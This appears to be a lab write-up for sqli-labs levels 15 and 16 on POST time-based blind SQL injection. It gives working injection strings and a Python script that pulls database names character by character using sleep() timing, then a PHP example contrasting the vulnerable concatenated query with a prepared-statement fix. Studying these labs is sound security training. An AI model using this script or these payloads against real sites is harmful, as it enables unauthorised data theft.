Less 15
POST method, single-quote time-based blind injection
This level is much like the earlier GET-based blind injection levels, so there is not much to explain. The backend query is select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]'
So you only need to construct uname=admin' to break out of the string literal.
Here is a script that extracts the database names; change the SQL statement and it works for the other steps too.
#coding:utf-8
import requests, datetime

url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-15/"
char = "abcdefghijklmnopqrstuvwxyz_"
print("start!")
for i in range(0, 10):            # i-th row of information_schema.schemata
    database = ""
    for j in range(1, 20):        # j-th character of the name (mid() is 1-based)
        for ch in char:           # try one candidate character at a time
            time1 = datetime.datetime.now()
            # If() returns 1 at once when the guess is right and calls sleep(5) when it is wrong
            data = {'uname': "admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(5))#" % (i, j, ch),
                    'passwd': "1"}
            res = requests.post(url, data=data)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec < 4:           # no delay, so the guessed character is correct
                database += ch
                print(database)
                break
    print("the %d database: " % i)
    print(database)
print("end!")
The output ends up looking like this. The script is really slow to run though, since every request has to wait 5 seconds.......
Less 16
POST method, double-quote plus parenthesis time-based blind injection
This level is basically the same as the previous one; the backend statement changes slightly: select xxx from "table_name" where uname=("$_POST["uname"]") and passwd=("$_POST["passwd"]")
So you only need to construct uname=admin") to break out.
With a small change, the script above can still be used.
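Both levels share the same defect: the POST values are spliced into the SQL text, so a quote (Less 15) or a quote plus parenthesis (Less 16) closes the literal and the rest of the input is parsed as SQL. Below is an added example, not the sqli-labs source, showing the Less-15 style query next to a prepared-statement version in PHP/mysqli; the table and column names and the $db connection are assumed.

```php
<?php
// Added example, not the sqli-labs source. Table/column names are assumed;
// $db is an already-connected mysqli handle.

// Concatenated form (the pattern described for Less 15): the POST values
// become part of the SQL text, so uname=admin' ends the string literal early
// and whatever follows (the If(...sleep(5)) condition, then #) is run as SQL.
function login_concat(mysqli $db, string $uname, string $passwd): ?array
{
    $sql = "SELECT username, password FROM users "
         . "WHERE username='$uname' AND password='$passwd' LIMIT 0,1";
    $res = $db->query($sql);          // a crafted $uname changes this statement
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Prepared form: the statement and the values travel separately, so admin'
// or admin") is compared literally against the username column and never
// reaches the parser as code. The same fix covers the ("...") variant of Less 16.
function login_prepared(mysqli $db, string $uname, string $passwd): ?array
{
    $stmt = $db->prepare(
        "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    );
    $stmt->bind_param("ss", $uname, $passwd);
    $stmt->execute();
    $stmt->bind_result($u, $p);
    $row = $stmt->fetch() ? ['username' => $u, 'password' => $p] : null;
    $stmt->close();
    return $row;
}
```

With bound parameters the timing side channel the script above depends on disappears: every request returns at the same speed whether or not the guessed character was right.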